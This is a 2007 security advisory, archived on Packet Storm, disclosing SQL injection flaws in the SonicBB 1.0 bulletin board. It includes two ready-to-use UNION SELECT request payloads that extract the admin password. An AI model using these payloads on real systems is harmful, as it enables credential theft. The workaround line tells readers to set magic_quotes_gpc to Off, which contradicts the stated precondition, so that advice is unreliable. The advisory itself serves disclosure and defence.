exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sbb-sql.txt

sbb-sql.txt
Posted May 15, 2007
Authored by Jesper Jurcenoks | Site netvigilance.com

SonicBB version 1.0 suffers from multiple SQL injection vulnerabilities.

tags | exploit, vulnerability, sql injection
advisories | CVE-2007-1902
SHA-256 | 4238c5016d152f8249eae9a5bbfc2ea21a285513e6295e6c5aab388c1261a687

sbb-sql.txt

Change Mirror Download
  netVigilance Security Advisory #19

SonicBB version 1.0 Multiple SQL Injection Vulnerabilities

Description:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is compatible with any web server/operating system combo with PHP 4.x or higher installed.SonicBB is the ideal community software for all sites.

This vulnerabilities can be exploited only when PHP magic_quotes_gpc = Off.

External References:
Mitre CVE: CVE-2007-1902
NVD NIST: CVE-2007-1902
OSVDB: 33907

Summary:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is compatible with any web server/operating system combo with PHP 4.x or higher installed. SonicBB is the ideal community software for all sites.
Security problems in the product allow attackers commit SQL injections

Advisory URL:
http://www.netvigilance.com/advisory0019

Release Date:
05/14/2007

Severity:
Risk: High

CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Complete
Integrity Impact: Partial
Availability Impact: Partial
Impact Bias: Confidentiality
CVSS Base Score: 6.8

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed

Vulnerability Impact: Attack
Host Impact: SQL Injection.

SecureScout Testcase ID:
TC 17945
Vulnerable Systems:
SonicBB version 1.0

Vulnerability Type:
SQL injection allows malicious people to execute their own SQL scripts. This could be exploited to obtain sensitive data, modify database contents or acquire administrator's privileges.

Vendor:
iScripts
Vendor Status:
Contact with the Vendor was established and draft of the security advisory was provided on 10 April 2007, the vendor promised to fix the issue but stopped responding to our emails on 10 April 2007. There is no official fix at the release of this Security Advisory
Workaround:
Modify in the php.ini file following line: magic_quotes_gpc = Off.
Example:
SQL Injection Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/ search.php?query=1&part=post`<> '' UNION SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/
REPLY:
<table width="100%" cellspacing="1" cellpadding="5" class="forums"><tr><td width="40%" class="alt5">Post Title</td><td width="60%" class="alt5"> Author</td></tr><tr><td class="alt8"><a href="viewthread.php?id=1&p=1#post1">
Test Thread</a></td> <td class="alt7"><b><a href="members.php?id=1">admin</a> </b></td></tr><tr><td class="alt8"><a href="viewthread.php?id=1&p=1#post1"> [SQL INJECTION RESULT - ADMIN PASSWORD]</a></td><td class="alt7"><b><a href="members.php?id=1">[SQL INJECTION RESULT - ADMIN NAME]</a></b></td> ...
SQL Injection Vulnerability 2:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23
REPLY:
... <a href="viewthread.php?id=1">[SQL INJECTION RESULT - ADMIN PASSWORD]</a><br />By <a href="members.php?id=1">...

Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close